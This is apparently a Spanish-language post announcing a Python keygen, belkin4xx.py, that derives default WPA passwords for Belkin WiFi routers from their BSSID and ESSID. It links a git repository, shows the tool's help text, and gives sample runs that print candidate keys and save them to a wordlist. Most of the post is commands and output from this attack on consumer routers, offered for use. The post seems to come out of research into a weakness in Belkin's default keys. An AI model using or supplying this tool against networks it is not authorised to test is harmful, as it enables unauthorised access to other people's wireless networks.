Despues de leer este
PDF, lo he pasado a python. Asi que no está de más compartirlo.
Siento no dar más detalle pero no tengo más tiempo. Leer las referencias en el codigo
Repositorio:https://bitbucket.org/dudux/belkin4xx
Descarga:$ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git
Uso:$ python belkin4xx.py -h
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
[-a | -l]
>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-w [WORDLIST], --wordlist [WORDLIST]
Filename to store keys
-a, --allkeys Create all possible cases. Definitely recommended if
first attempt fails
-l, --list List all vulnerable mac address so far
required:
-b [BSSID], --bssid [BSSID]
Target bssid
-e [ESSID], --essid [ESSID]
Target essid. [BelkinXXXX,belkin.XXXX]
(+) Help: python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
$ python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
040D93B0
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
d49496b9
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0 -a
64949db9
d4999db9
D4029DB0
D40493B0
649996b9
649496b9
D4009DB0
34029DB0
d49496b9
d49996b9
D40293B0
340493B0
64999db9
d4949db9
34009DB0
D4049DB0
340093B0
34049DB0
340293B0
D40093B0
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0 -a -w keys.txt
$ cat keys.txt
64949db9
d4999db9
D4029DB0
D40493B0
649996b9
649496b9
D4009DB0
34029DB0
d49496b9
d49996b9
D40293B0
340493B0
64999db9
d4949db9
34009DB0
D4049DB0
340093B0
34049DB0
340293B0
D40093B0